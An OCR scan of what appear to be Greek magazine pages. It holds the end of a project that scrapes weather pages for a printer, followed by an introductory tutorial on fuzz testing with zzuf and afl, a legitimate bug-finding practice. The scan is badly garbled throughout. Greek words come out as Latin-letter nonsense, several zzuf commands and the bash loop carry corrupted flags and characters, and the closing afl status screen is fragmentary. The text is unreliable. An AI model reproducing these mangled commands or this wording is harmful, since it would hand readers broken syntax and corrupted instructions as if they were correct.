µε τη μορφή XML ἡ JSON. Χαρακτηριστι- κόστος µιας τέτοιες πλακέτας εἶναι εξαιρετικἁ χαμηλό. 
KO παράδειγµα αποτελεί η OpenWeather. 
Σ' αυτό το σημείο µπορεί να σας ξαφνιάσουμε, αλλά εμεὶς επιλέξαμε τη (φαινομενικά) 
δύσκολη λύση, της εξαγωγἠς των δεδομένων απὀ σελίδες HTML. Μια υπηρεσία που 
διαπιστώσαμε OT! μάς εξυπηρετεί ιδιαίτερα, τόσο για την EYKUPOTNTA της ὁσο και για 
τον GNAO τρόπο εμφάνισης των δεδομένων, εἶναι το Meteo.gr, που υποστηρίζεται ano 
το Εθνικό Αστεροσκοπείο Αθηνών. Μάλιστα, για ακόµα µεγαλύτερη ευκολία αποφα- 
σίσαμε να µη στηριχτούµε στο "κανονικό" site, αλλά σ' Ekeivo που προορίζεται για 
κινητά (http://meteo.gr/m). Σε αυτή την εκδοχἠ του site η πρόγνωση για κάθε περιοχἠ 
εμφανίζεται σε µια ξεχωριστή σελίδα, ενώ και η δομή των σελἰδων εἶναι απλούστερη. 


Συνεχἰζοντας τη θεωρητικἠ μελέτη του ζητήματος, μεταβήκαμε στο mobile site του 
meteo και συγκεκριµένα στη σελίδα µε την πρὀγνωση για τη Χίο -Tnv ιδιαίτερη na- 
Tpida του γράφοντα :D Το πρὠτο πράγμα που κάναμε ἠταν να σημειώσουμε κἄπου 
το URL, ενώ το δεύτερο ἧταν να εξετάσουμε τον κὠδικα HTML της σελίδας. Πολύ 
γρήγορα διαπιστώσαμε ὅτι οι πληροφορίες που µας ενδιέφεραν -αυτὲς για τη βραχυ- 
πρόθεσµη πρὀγνωση- εμφανίζονταν αμέσως μετὰ ano το στοιχείο <li>, που αναφέρει 
το ὀνομα της τοποθεσίας (στην περἱπτωσή µας "ΧΙΟΣ"). Enionc, παρατηρήσαμε ὁτι 
τα δεδομένα της βραχυπρόθεσµης πρόγνωσης χωρίζονται ano τα υπόλοιπα µε Eva 
στοιχείο <style>. Επομένως, για την εξαγωγἠ των δεδομένων θα ἧταν αρκετό να 
απομονώσουμε TN σχετικὴ περιοχὴ της σελίδας και να AMAIPEGOUHE TIG ετικέτες HTML 
με τη βοήθεια κανονικῶν εκφράσεων”. 


Εφόσον εἰχαμε λύσει -ἐστω και θεωρητικά- το ζήτημα της λήψης των δεδομένων, 
στραφἠκαμµε σε κάποια γενικότερα ζητήματα. Όπως αναφέραμε και στην εισαγωγή, 
αποφασίσαμε OT! η κατασκευὴ µας δεν θα τυπώνει ὀλες τις προβλέψεις για τον καιρὀ. 
O κὠδικας θα ελέγχει αν η θερµοκρασία ἐχει ξεπεράσει κἄποια ὁρια προς τα πάνω ἡ 
προς τα κάτω, αν η ἐνταση των ανέμων ἐχει υπερβεί κάποια τιµή, καθώς και το αν 
εμφανίζονται συγκεκριμένες λέξεις μέσα στην πρόγνωση, ὅπως, π.χ., καταιγίδα, χιο- 
νόπτωση κ.ά. Ειδοποιήσεις θα τυπώνονται σ' αυτὲς τις περιπτώσεις και μόνο. Τέλος, 
επειδἠ η βιβλιοθήκη escpos υποστηρίζει μόνο τους πρώτους 128 χαρακτήρες του 
ASCII, αποφασίσαμε ὁτι το πρόγραμμα πρέπει να μετατρέπει τους ελληνικούς xapa- 
κτἠρες σε λατινικούς. Ουσιαστικά, αποφασίσαμε ὁτι τα μηνύματα του προγράµµατος 
θα εἶναι γραμμένα σε greeklish. Πρόκειται για µια πρὀχειρη λύση, GAA εἱμαστε σἰγου- 
poi ὅτι μπορείτε να επανορθώσετε την κατάσταση, επεκτείνοντας και βελτιώνοντας 
τον κὠδικά µας ;) Μια παρουσίαση του προγράµµατος που γράψαμε ακολουθεἰ στο 
δεύτερο µέρος του άρθρου, στη σελἰδα 56. 


2. Περισσότερα για το παντοδύναμµο εργαλείο που ονομάζεται "κανονικὲς εκφράσεις" μπορείτε να μάθετε απὀ τη σειρἁ ἄρθρων Tou Spir@l 
Evolut10n, στα τεύχη 021, 022, 023 και 024. 
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Το 1946 ἑνας μικροσκοπικὸς σκόρος, παγιδευμένος σε κάποιο ρελὲ του ηλεκτροµη- 
χανικού υπολογιστή Mark II, καταφέρνει va θέσει το μηχάνημα εκτός λειτουργίας. 
Τότε χρησιμοποιήθηκε για πρώτη φορά ο ὀρος bug, που πολύ σύντομα μετατράπηκε 
σε συνώνυμο του πονοκεφάλου για κάθε προγραμματιστή. Με τη ραγδαἰα εξέλιξη 
των ηλεκτρονικὠν και των πληροφοριακών συστημάτων που ακολούθησε, δεν εξε- 
λἰχθηκαν μόνο τα προγράμματα. Τα bugs ἄφησαν πίσω τη βιολογική τους µορφή κι 
ἐγιναν πολύ πιο περίπλοκα. Καθώς μάλιστα οι υπολογιστές ἀρχισαν να εμπλέκονται 
περισσότερο στη ζωὴ µας, πολλά ano αυτά Ta bugs ἐγιναν κι εξαιρετικἁ επικίνδυνα. 
Μολαταύτα, σχεδὸν 70 χρόνια µετά, η ουσία των bugs παραμένει ἴδια: Πρόκειται για 
σχεδιαστικἁ ἡ προγραμματιστικἁ λάθη, ενδεχομένως μαζί µε άλλες παραλείψεις, 
τα οποία κάνουν va σύστημα va συμπεριφἑρεται απρὀβλεπτα. Κάπως ἑτσι, ὅσοι 
ασχολούνται µε την ανάπτυξη εφαρμογών αντιμετωπίζουν το EENG αγωνιώδες EPW- 
τηµα: Πώς μπορώ να αποφύγω ἡ να διορθώσω ἐγκαιρα τα λάθη στον κὠδικά µου; 
Αντίστοιχα, ὁσοι ειδικεύονται στην ασφάλεια των συστημάτων βασανἰζουν το μυαλὸ 
τους HE το iio ακριβώς πρὀβλημα: Πώς μπορώ να βρω τα bugs στον κὠδικα ἄλλων; 


Μια παραδοχἠ που μπορούμε να κάνουμε µε ασφάλεια εἶναι OT! Ta bugs δεν θα 
εκλείψουν ποτὲ. Υπάρχουν σε πάρα πολλά συστήματα και προγράµµατα, ενώ εἶναι 
σίγουρο ὁτι δεν θα σταματήσουν να εμφανἱζονται και σε νέα. Άλλωστε, αν λάβουμε 
υπόψη τις πρὀσφατες εξελίξεις (βλέπε Heartbleed και Shellshock), συνειδητοποι- 
οὐμε OTI ὁσα μάτια κι αν κοιτάζουν τον κὠδικα ενὸς προγράµµατος, ακόµα και για 
ολόκληρες δεκαετίες, υπάρχει πάντα η πιθανότητα να ξεφύγει kaTI. Παραδοσιακά, ο 
εντοπισμὸς των bugs πραγματοποιεἶται µε τη µελέτη του πηγαϊου κὠδικα. Υπάρχει 
όμως και µια σχετικἁ νεότερη τεχνικἡ που ακούει στο ὀνομα fuzz testing ἡ αλλιώς 
fuzzing. 


Αμέτρητοι TUXGIO! πειραματισμοἰ 


Το fuzzing αποτελεί µια τεχνικἠ κατὰ την onoia Eva πρὀγραμμα τροφοδοτείται µε µη 
αναμενόμενα δεδομένα. Εάν στην πορεία της διαδικασίας εντοπιστεἰ κἀποιο σφάλμα 
(απροσδὀκητος τερματισμὸς, κόλλημα κ.λπ.) θεωρούμε ὁτι έχει βρεθεἰ και κἄποιο 
bug. Τώρα βέβαια µπορεί ν' αναρωτηθείτε: Πὼς ορίζονται τα µη αναμενόμενα ðs- 
δομένα; Δεν θα ἐπρεπε να μελετήσουμε τον πηγαὶο κὠδικα για να καταλάβουμε 
ποια δεδομένα ενδέχεται να προξενήσουν προβλήματα; H αλήθεια εἶναι πως, ναι, 
θα έπρεπε. Αν αυτή η εργασία γινόταν χειροκίνητα, θα ἡμασταν υποχρεωμένοι va 
μελετήσουμε τον κὠδικα και µε βάση την εμπειρία -ἡ ακόμα και µε βάση τη διαἰ- 
σθηση- να σκεφτούμε ποια δεδομένα ενδέχεται να προκαλέσουν δυσλειτουργἰες. 
Στην περίπτωση του fuzzing, ὁμως, οι απαραίτητοι ἐλεγχοι πραγματοποιούνται ano 
ειδικἁ εργαλεία που ονομάζονται fuzzers. Τα συγκεκριμένα εργαλεία τροφοδοτούν 
το υπὀ εξέταση πρὀγραμμα µε αμέτρητες παραλλαγὲς δεδοµένων εισόδου, οι οποίες 
παράγονται αυτόματα. Yn' auth την ἐννοια, θα μπορούσαμε να πούμε ότι οι fuzzers 
ψάχνουν στα τυφλά. H τεχνικὴ Tou fuzzing λοιπὸν μπορεί να μοιάζει αντιπαραγωγι- 
Kn, ἐχει ωστόσο δύο πολὺ σημαντικἁ πλεονεκτήματα: 


ο Όταν εντοπίζεται κἄποιο πρόβλημα, ο ερευνητἠς μπορεί να γνωρίζει ποια ακρι- 
βὼς δεδομένα το προκάλεσαν. Αν επιθυμεί να επιδιορθώσει το πρὀβληµα θα 
µπορεί να βρει σχετικἀ εὐκολα το bug, εφόσον θα ξέρει NOTE σταμάτησε η 
ομαλὴ λειτουργία του προγράµµατος και υπὀ ποιες συνθήκες. Αν and την ἄλλη 
επιθυμεὶ να εκμεταλλευτεί το πρὀβλημα, τότε θα ξἐρει πὼς ακριβώς να το nE- 
τύχει αφού θα διαθέτει τουλάχιστον ἑνα σύνολο δεδομένων που πυροδοτεί την 
προβληματικἠ συμπεριφορά. Αναλύοντας τον πηγαίο κὠδικα θα μπορούσαν να 
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βρεθούνε δεκάδες ύποπτα σηµεία, που υπό κάποιες συνθήκες θα μπορούσαν 
να προκαλέσουν προβλήματα. Στην πράξη, όμως, µόνο λίγα ano αυτά θα ἦταν 
εκμεταλλεύσιµα και TO σχετικὀ "ξεσκαρτάρισμα" θα απαιτούσε πρὀσθετο xpo- 
νο και φυσικά κὀπο. 


ο Οι fuzzers παράγουν τα πιθανώς επικίνδυνα δεδοµένα και στη συνέχεια EAEY- 
χουν την αντίδραση του προγράµµατος, χωρίς να ασχολούνται µε τον πηγαίο 
κὠδικα. Έτσι, εἶναι δυνατὸ να χρησιμοποιήσουμε τον ἰδιο fuzzer για napa πολ- 
Ad προγράμματα - ασχέτως του αν ἐχουμε πρὀσβαση στον πηγαἰο κὠδικα ἡ 
ὀχι. Πα παράδειγµα, μπορούμε να επιλἐξουµε ἑναν fuzzer που παράγει αρχεία 
ἦχου και µε τη βοἠθειἁ του να τσεκάρουµε Eva πλήθος προγραμμάτων avana- 
ραγωγἠς µουσικἠς κι ὀχι μόνο Eva. Επιπρὀσθετα, µε τους αυτοματισμούς που 
προσφέρουν τα εν λόγω εργαλεία, μπορούμε να τσεκάρουµε πολλά προγράμ- 
ματα ταυτόχρονα. 


Αρχικἠ προσέγγιση 


Ας υποθέσουμε ὁτι αποφασίζει κἀποιος να ξεκινήσει την ἐρευνα για τον εντοπισμὀ 
των κρίσιμων bugs σε Eva πρόγραμμα. Αναρωτιέστε γιατὶ να ασχοληθεἰ κανεὶς µε 
κάτι τέτοιο; Υπάρχουν πάρα Πολλοί λόγοι, αλλά εμεἰς θα αναφέρουμε τον πιο ευγε- 
vn: ZKEMTEITE ὁτι αυτὸς ο "κάποιος" θέλει να βάλει το λιθαράκι του, ὥστε το τάδε 
πρόγραμμα να γίνει λίγο πιο σταθερὀ ἡ πιο ασφαλἑς. Αν η μέθοδος που EXE! ano- 
φασίσει ν' ακολουθήσει εἶναι αυτή του fuzzing, θα πρέπει πρώτα να ξεκαθαρίσει τι 
δεδομένα δέχεται το πρὀγραμµμα και µε ποιον τρόπο. AuTO το στἆδιο θα μπορούσε va 
συμπυκνωθεὶ στην απάντηση των ακόλουθων δύο ερωτημάτων: 


ο Τι εἶδους δεδοµένα δέχεται στην εἰσοδό του το πρὀγραμμα; Text, binary ἡ κάτι 
πιο εξειδικευμένο και περίπλοκο, ὁπως audio, video κ.λπ.; 


ο Μήπως αξιοποιεῖται κἄποιο δικτυακὸ πρωτόκολλο (HTTP, FTP κ.ἀ.) για τον 
ἐλεγχο του προγράµµατος; 


Όπως υποψιάζεστε, υπάρχουν πολλά εργαλεία για fuzzing και το καθένα μπορεί va 
χειριστεί διαφορετικού εἶδους δεδομένα, ὁπως επίσης και να τροφοδοτήσει το UNO 
εξέταση πρὀγραμμα µε διαφορετικὲς μεθόδους. Πα τους πιο σκληροπυρηνικοὺς npo- 
σφἑρεται και η λύση της κατασκευἠς ενὸς νέου fuzzer, µε τη βοήθεια κάποιου ano 
τα δημοφιλή fuzzing frameworks!. Πάντως, ακόµα και σ' αυτή την προχωρημένη 
περίπτωση, ο επίδοξος δημιουργός Tou fuzzer θα πρέπει να EXE! απαντήσει στα ερω- 
τήµατα που αναφέραμε παραπάνω. Στο παρὀν άρθρο, µια και αποτελεί την εισαγωγἠ 
στο OAO θέμα, θα εστιάσουµε στους fuzzers γενικἠς χρήσης και θα παρουσιάσουμε 
δύο αντιπροσωπευτικἁ εργαλεία: Το zzuf και το afl. Το πρὠτο εἶναι παλιὸ Kal anAo- 
Ἰκό, ενώ το δεύτερο εἶναι σύγχρονο και διαθέτει Eva εἶδος "ευφυΐας" που TOU ἐχει 
επιτρέψει να διαπρέψει στο χώρο. 


Στρατευμένη τύχη 


Το zzuf αλλοιώνει µε TUXGIO τρόπο τα δεδομένα που του δίνουμε και στη ouv- 
χεια τροφοδοτεί TO UNO εξέταση πρόγραμμα µε τις διάφορες τυχαίες μεταλλάξεις. 
H εγκατἀστασἡ του σε ὁσες διανομές Linux στηρίζονται στο Debian γίνεται µε τον 
εξἠς απλούστατο τρὀπο: 


1. Ναι, υπάρχουν και τέτοιους εἶδους frameworks και κάποια μάλιστα εἶναι και δημοφιλή (π.χ., Peach, SPIKE κ.ἁ.). 
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sudo apt-get install zzuf 


Ας υποθέσουμε OT! θέλουμε να εξετάσουμε TO δημοφιλὲς εργαλεὶο cat και διαθέτου- 
µε Eva αρχείο κειµένου, το οποίο ονομάζεται target.txt και περιλαμβάνει μερικοὺς 
επαναλαμβανόμενους χαρακτήρες. H εργασἰα µας µε το zuff θα μπορούσε va ξεκι- 
νήσει κάπως έτσι: 


zzuf -γθ.Θ8 cat target.txt 


Χρησιμοποιώντας την παράμετρο -r (απὸ To ratio) δηλώνουμε TO ποσοστὀ των bits 
που θέλουμε να αλλοιώνει το zuff, σε κἆθε τυχαία παραλλαγἡ του αρχείου target. 
Προαιρετικἀ, θα μπορούσαμε να δώσουμε το SIKO µας seed στον αλγόριθμο που 
πραγματοποιεί τις τυχαίες μεταβολές, ὁπως επίσης και Eva ολόκληρο εὖρος απὀ 
seed! Κάτι τέτοιο μπορεὶ να γίνει ως εξής: 


zzuf -5θ:43 -R'\x@@-\x2@\x7f-\xff' -r@.03 cat target.txt 


Προφανώς, η παράμετρος για τη δήλωση Tou seed εἶναι η -s (ano To seed). Στο 
παράδειγµα, επιβάλλουμε στο zuff να χρησιμοποιήσει µια περιοχή τιμών για το seed 
(ano 0 έως 43) και OX! μία μόνο τιµή. Έτσι, το πρὀγραμμα θα εκτελεστεἰ αυτόματα 
πολλὲς φορὲς και σε κάθε εκτἐλεση θα χρησιμοποιεί διαφορετικὀ seed. Η παράμε- 
τρος -R (ano το refuse) καθορἰζει µια λίστα τιμών που δεν θέλουμε να χρησιµοποι- 
οὗνται NOTE. Στο παρἀδειγμὰ µας ἔχουμε αποκλείσει τους µη εκτυπὠσιμους xapa- 
κτἠρες (όσους έχουν κωδικό ASCII ano 0x00 ¿wç 0x20), καθὼς και τους τελευταίους 
127 (µε κωδικὀ ASCII απὀ 0x7f έως Oxff), οι οποίοι δεν εἶναι standard. Όμως, doa 
εἶδαμε μέχρι στιγμὴς εξυπηρετούσαν περισσότερο στο va σας δώσουν µια ιδέα του 
πώς λειτουργεί το zuff και τίποτα παραπάνω. ‘Eva πιο ρεαλιστικὀ παράδειγµα fuzzing 
µε το zzuf ἐχει ως εξἠς: 


zzuf -s 0:1000000 -r 0.01 -c -C © -q -T 3 cat target.txt 


H παράμετρος -q (ano To quiet) καθιστὰἁ το npòypappa λακωνικὸὀ κι επιβάλλει την 
εμφάνιση των απολύτως απαραίτητων μηνυμάτων. Πολλά προγράµµατα, εκτὸς and 
τα δεδομένα που τους δίνουμε κάθε φορά που εκτελούνται διαβάζουν και κἄποιο 
αρχείο µε ρυθμίσεις. Για το zzuf, το περιεχόµενο αυτού του αρχείου δεν διαφέρει 
σε τίποτε ano τα υπόλοιπα δεδοµένα που δέχεται το UNO εξέταση πρὀγραμμα. Ἐτσι, 
επειδή η τυπική συμπεριφορά του επιβάλλει την αλλοίωση *OAWV* των εισερχόµε- 
νων δεδομένων, καταλήγει να επέμβει και στις ρυθμίσεις. H παράμετρος -c (ano το 
cmdline) εξασφαλἰζει ότι το zzuf θα αλλοιώσει μόνο τα δεδοµένα που έχουμε καθο- 
ρίσει στη γραμμή εντολών, κατὰ την εκτἐλεση του προγράμματος. H παράμετρος 
-C (ano το max-crashes) ορίζει πόσες φορὲς θα πρέπει να κολλήσει το UNO εξέταση 
πρόγραμμα πριν σταματήσουν οι δοκιμές. Σημειώστε OT! το zzuf σταματά εξ ορισμού 
μετὰ το πρώτο κόλλημα. Αν δώσουμε την τιµή 0 στη συγκεκριμένη παράμετρο, τότε 
οι ἐλεγχοι θα συνεχίζονται ανεξάρτητα απὀ το πλήθος των κολλημάτων. Τέλος, η 
παράμετρος -T ορἰζει τη μέγιστη χρονικἡ διάρκεια κάθε δοκιμής. AUTH η παράμετρος 
εἶναι ιδιαίτερα χρήσιμη, καθώς το zzuf εἶναι πιθανὀ να δημιουργήσει κἄποιο infinite 
loop στο υπό εξέταση πρὀγραμμα. Σε αυτή την περίπτωση, av δεν βρισκόμαστε 
μπροστὰ στον υπολογιστή το zzuf θα καταλήξει να σπαταλἀ χρόνο χωρὶς να κάνει 
TINOTA. 


Εάν εἶμαστε τυχεροί (ἡ ἀτυχοι, εξαρτάται ano την οπτικὴ ;) μετὰ ano κάποια ώρα θα 
εμφανιστεὶ Eva μήνυμα µε την ακὀλουθη µορφή: 


zzuf[s=215,r=0.004]: signal 11 (SIGSEGV) 
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AUTO σημαϊνει ὁτι TO UNO εξέταση npòypappa παρουσίασε Eva Segmentation Fault 
σε μία ano τις δοκιμές, για τις οποίες το Seed εἶχε την τιµή 215. Μπορούμε ν' αποµο- 
νώσουμε τη συγκεκριμένη προσπάθεια για περαιτέρω μελέτη, δίνοντας κάτι τέτοιο: 


zzuf -r 0.004 -s 215 < target.txt > crash.txt 


0.01 cat target 


ABRAAAAAAAAAAA 
Ξ .08 cat target 
CBAAAQAAAAAACAAAATATACQBRRAACAEAEGA 
MEPIKEG OOKILIGOTIKEG πτήσεις TOU zzuf, µε διαφορετικό ratio κάθε φορά. 


Λύση για τα Windows 


Αν και οι προγραμματιστὲς του zzuf σχεδίαζαν αρχικἁ να δημιουργήσουν και pia 
ἐκδοση για Windows, κάτι TETOIO δεν έγινε NOTE. Ωστόσο, αν επιµένετε να χρησιμο- 
ποιείτε Windows και το συγκεκριμένο εργαλείο σας ενθουσίασε, µπορείτε να aKo- 
λουθήσετε µια ενδιάµεση λύση: Μπορείτε να εγκαταστήσετε το zzuf σε µια εικονικἠ 
μηχανὴ µε Linux κι ano εκεί, µε τη βοήθεια ενὸς απλού BASH script, να πάρετε σε 
ξεχωριστά αρχεία ὀλες τις τυχαίες μεταλλάξεις των δεδομένων. Στη συνέχεια uno- 
peite να τροφοδοτήσετε το UNO εξέταση NPOYPGHHG µε τα συγκεκριμένα αρχεία, σε 
οποιοδήποτε AEITOUPYIKO κι αν τρέχει. Ακολουθεἰ ο κὠδικας του μικρού script, που 
δημιουργεί τα αρχεία µε τα παραλλαγμένα δεδομένα: 


#!/bin/bash 
for i in {@..1000}; do 
for f in example.txt; do 
zzuf -r 0.01 -s $i < $f > $i-$Ff; 
done; 
done; 


Το αρχείο example.txt περιλαμβάνει το αρχικό σύνολο δεδοµένων. Μετά την EKTE- 
λεση του script θα προκύψουν αρχεία µε ονόματα της poppis ####-example.txt. 
Με τη βοἠθειἁ τους θα µπορείτε να ξεκινήσετε τις ανελέητες δοκιμές σας και, αν 
σταθεἰτε τυχεροί, να εντοπἰσετε κάποιο VEO bug. 


Η εξέλιξη του κουνελιών 


Πριν ano μερικούς μήνες o Michal Zalewski (http://lcamtuf.coredump.cx) δηµοσὶ- 
ευσε Evav fuzzer µε TO ὀνομα afl (American Fuzzy Lop). Πρόκειται για την εξέλιξη 
ενὸς προηγούμενου εργαλείου που εἰχε κατασκευάσει ο ἴδιος και ονομαζόταν bunny- 
the-fuzzer?. O afl ανήκει στην κατηγορἱα των "ἐξυπνων" fuzzer και λύνει ἑνα πολύ 
σημαντικὸ πρὀβλημα που αντιμετωπίζουν τα εργαλεία της κατηγορίας: AUTO της 
συνολικἠς κάλυψης του κὠδικα. Αναρωτιέστε τι θα πει αυτό; Όταν προσπαθούμε να 
βρούμε τα πιθανὰ bugs ενὸς προγράμματος οφείλουμε να εξετάσουμε *OAOKANPO* 
τον κὠδικα. Όπως ἐχουμεπει, ὁμως, οι fuzzers δεν αναλύουν τον πηγαἰο κὠδικα των 
προγραμμάτων. Πραγματοποιούν δοκιμές µε τυχαίες παραλλαγές των δεδομένων 


2. Το afl εἶναι επίσης ράτσα κουνελιού ;) 
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εισόδου κι εξετάζουν τις αντιδράσεις του προγράµµατος. Ως εκ τούτου, ακόµα και 
μετά ano Eva τεράστιο πλήθος δοκιμών ενδέχεται να ¿xouv ελέγξει ἑνα μικρὸ µέρος 
της λειτουργικότητας του προγράµµατος και κατ' επἑκταση μία μόνο περιοχἠ του 
κὠδικα. O afl αντιμετωπίζει αυτό το πρόβλημα HE την εξἠς μέθοδο: 


ο Με τη βοήθεια των δύο compilers που συνοδεύουν το afl (afl-gcc και afl-g++), 
το πρὀγραμµα που εξετάζουμε εμπλουτίζεται µε μερικἁ VEG τμήματα κὠδικα τα 
οποία τοποθετούνται στο ξεκίνημα κάθε συνάρτησης και σε κάθε διακλάδωση. 
Η διαδικασἰα αυτή ονομάζεται code instrumentation. 


ο Το πρὀγραμμα τροφοδοτεἰται µε δεδοµένα που παραλλάσσονται (γίνονται 
fuzzed) µε διάφορες τεχνικἑς. 

ο Με τη βοήθεια του instrumentation, ο afl καταγράφει ποια κομμάτια του κὠδι- 
κα χρησιμοποιούνται και, µε τη χρήση γενετικὠν αλγορίθμων, το fuzzing των 


δεδομένων εξελἰσσεται µε τέτοιο τρόπο ὥστε να επιτευχθεἰ η μέγιστη κάλυψη 
του κὠδικα. 


Αν κι αυτὸ το τέχνασμα δεν εἶναι εντελώς καινούριο, η υλοποἱησή του εἶναι εξαιρε- 
TIKG πετυχημένη και καθιστά To afl Evav εὐχρηστο, γρήγορο κι εξαιρετικά αποτελε- 
σματικὀὸ fuzzer! 


Baoikh χρήση 
Πα να εργαστούμε µε το alf πρἐπει πρὠτα να κατεβάσουµε και να µεταγλωττίσουμε 
την πιο πρόσφατη ἐκδοση του πηγαΐου κὠδικα. Κάτι τέτοιο μπορεί να γίνει πανεύκο- 
λα ano την κονσόλα, µε τη βοήθεια του wget: 

$ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz 


Αφού αποσυμπιἐέσουµετο πακέτο HE TOV κὠδικα, αρκεἰ να μεταβούμε στον VEO κατά- 
λογο που ἐχει δημιουργηθεί και να δώσουμε Eva απλὸ make?. Κατόπιν μπορούμε να 
χρησιμοποιήσουμε τους compilers Tou afl, MOTE να PUTEWOUHE στον κὠδικα των UNO 
εξέταση προγραμμάτων τα απαραίτητα "όργανα επιτήρησης". Πα Eva πρὀγραμμα nou 
αναπτύσσουμε σε C, αρκεἰ να μεταβούμε στον κατάλογο που περιἐχει τον πηγαίο 
κώδικα και να δώσουμε KATI τέτοιο: 

$ CC=/path/to/afl/afl-gcc ./configure 

$ make clean all 
Αν το πρὀγραμμὰ µας εἶναι γραμμένο σε C++ πρέπει να χρησιμοποιήσουμε Tov ἄλλον 
compiler (afl-g++) και σ' αυτή την περίπτωση θα χρειαστεί να εκτελἐσουµμε τα εξἠς: 

$ CXX=/path/to/afl/afl-g++ ./configure 

$ make clean all 
Στη συνέχεια μπορούμε να ξεκινήσουμε την εργασία µας, εξετάζοντας το εκτελέσιμο 
που προέκυψε απὀ τη μεταγλώττιση: 

./afl-fuzz -i testfiles_dir -o findings dir /path/to/compiled_app (38 
Το alf μπορεί να δεχτεἰ και να αλλοιώσει αρχεία δεδοµένων SIGMOPETIKWV τύπων, 
γεγονὸς που διευκολύνει τη διεξαγωγἠ πάρα πολλών ελέγχων µε μία μόνο EKTEAE- 
ση. Με την παράμετρο -i (input) ορίζουµε τον κατάλογο στον οποίο βρίσκονται τα 


3. Αν δεν υπάρχει στο σὺστημά σας το προγραμμάτκι make, θα πρέπει να εγκαταστήσετε όλο το πακέτο εργαλείων που απαιτούνται για τη 
μεταγλώττιση εφαρμογών. Αυτό γίνεται εὖκολα δίνοντας sudo apt-get install build-essential 
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αρχεία µε την "πρώτη VAN". H παράμετρος -o (output) δηλώνει τον κατάλογο στον 
οποίο θα αποθηκεύονται τα πιθανὰ ευρήματα, δηλαδὴ το εἶδος του προβλήματος που 
EVTONIOTNKE και το σύνολο δεδομένων που το προκάλεσε. To afl δεν θα μπορούσε 
να γνωρίζει τον τρόπο χρήσης κάθε προγράµµατος, οὐτε το NAG λαμβάνει δεδομένα 
ano το χρήστη. Σκεφτείτε ὁτι υπάρχουν προγράµµατα που δέχονται δεδομένα ano 
το standard input κι ἄλλα, που διαβάζουν αρχεία. Εξάλλου, κἄποια ano τα προγρᾶμ- 
ματα της δεύτερης ομάδας απαιτούν και τις κατάλληλες παραμέτρους, ενώ κάποια 
άλλα ὀχι. Όταν το πρὀγραµμµα που εξετάζουμε τροφοδοτείται ano To standard input, 
αρκεί να δώσουμε το ὀνομὰ του στο afl. Όταν όμως πρὀκειται για πρὀγραμµα που 
δέχεται αρχεία ἠ/και παραμέτρους, πρέπει να επιστρατεύσουµε τους χαρακτήρες 
@@. Με τη βοἠθειά τους υποδεικνύουμµε στο afl που τοποθετούνται τα αρχεία εισὀ- 
δου, κατἀ την εκτέλεση του προγράµµατος που εξετάζουμε. 


Όπως καταλαβαίνετε, για να εργαστούμε µε τον τρόπο που παρουσιάσαµε πρέπει va 
διαθέτουμε τον πηγαἰο κὠδικα του προγράµµατος που ελέγχουμε. AUTO ὁμως δεν 
εἶναι πάντοτε εφικτὀ. Έτσι, το afl µπορεί να λειτουργήσει και σαν "απλὸς" fuzzer, 
χωρίς να ἔχει προηγηθεἰ το code instrumentation. Κάτι τέτοιο επιτυγχάνεται µε την 
παράμετρο -n. 


Προς γνώση και συμμόρφωση 


Πριν ξεκινήσετε την ενασχόληση µε το fuzzing εἶναι χρήσιμο να έχετε μερικά 
πράγματα κατὰ νου. Για να ολοκληρωθεί ἑνας κύκλος του afl απαιτείται χρονικὀ 
διάστηµα ανάλογο της ἑκτασης του κὠδικα του προγράµµατος που εξετάζουμε, 
καθώς και των δυνατοτήτων του υπολογιστή µας. Σε ορισμένες περιπτώσεις, 
αυτό το χρονικὀ διάστηµα µπορεί να διαρκέσει μερικὲς μέρες! Στο ενδιάμεσο, το 
afl θα δημιουργεἰ και θα διαγράφει εκατοντάδες χιλιάδες αρχεία µε πολὺ μεγάλο 
ρυθμὀ. Auth η διαδικασία συνεπάγεται µία υπολογίσιµη καταπόνηση για το σκλη- 
pò δίσκο - ειδικἀ αν εἶναι SSD. Δεν θἐλουµε να σας τρομάξουμµε και δεν υπονο- 
οὖμε OT! θα προκληθεἰ κάποια βλάβη, αλλά αν το μηχάνημα χρησιμοποιείται ou- 
xva για fuzzing τότε ο χρόνος ζωής του δίσκου εργασίας μάλλον θα µειωθεἰ. Mia 
πολὺ καλἠ λύση για την αντιμετώπιση του προβλήματος εἶναι η δηµιουργία ενὸς 
εικονικού δίσκου στη μνήμη RAM (ram-disk) και η χρήση του afl πάνω σε αυτόν. 


Μελετώντας το ατύχημα 


Οι δυνατότητες Tou afl δεν εξαντλούνται σε ὁσα αναφέραμε. Μία πολὺ ενδιαφἐρου- 
σα λειτουργία εἶναι το λεγόμενο crash exploration mode, που ενεργοποιείται µε την 
παράμετρο -C. Ας υποθέσουμε OT! έχουμε χρησιμοποιήσει το afl µε τον "κανονικό" 
τρόπο κι έχουμε εντοπίσει κάποια σύνολα δεδομένων που καταφέρνουν να KOAAN- 
σουν το UNO εξἐταση πρὀγραμμα. Παρεμπιπτόντως, τα σχετικἁ σύνολα δεδομένων 
(εφόσον βρεθούν) αποθηκεύονται στον υποκατάλογο crashes, μέσα στον κατάλογο 
που έχουμε ορίσει σαν ἐξοδο του afl (παράμετρος -ο). Σε GUTO το σηµείο ο αναλυτής 
γνωρίζει ὁτι ἐχει εντοπίσει τουλάχιστον Eva bug. Το επόμενο βήμα εἶναι να ελέγξει 
αν και κατὰ NOOO εἶναι εὐκολο να εκμεταλλευτεί κανεὶς το συγκεκριμένο bug - το 
κατὰ nooo εἶναι exploitable, αν προτιμάτε. Σε αυτὴ την εργασία βοηθάει το crash 
exploration mode του afl! Το μόνο που ἐχει να κάνει ο αναλυτἠς εἶναι να ενεργοποι- 
ἠσει το εν λόγω mode και να δώσει Eva ano τα σύνολα δεδομένων που προκάλεσε TO 
κόλλημα. Τότε το afl χρησιμοποιεί γενετικούς αλγόριθμους για την αλλοίωση των δε- 
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american fuzzy lop 0.470 (readpng) 


process timing 
0 days, O hrs, 4 min, 43 
0 days, O hrs, 0 min, 26 
none seen yet 
0 days, 0 hrs, 


38 (19.49%) 
ο (0.00%) 


51 
map 


1 min, 
cycle progress 


stage progress 
interest 32/8 
0/9990 (0.00%) 
654k 
2306/sec 
fuzzing strategy yields 
88/14.4k, 6/14.4k, 6/14.4k 
0/1804, 0/1786, 1/1750 
31/126k, 3/45.6k, 1/17.8k 


overall results 


195 
ο 


sec 
sec 


sec 1 
coverage 
1217 (7.43%) 
2.55 bits/tuple 


findings in depth 


128 (65.64%) 

85 (43.59%) 

ο (0 unique) 

1 (1 unique) 
path μόρια pd 


178 
114 


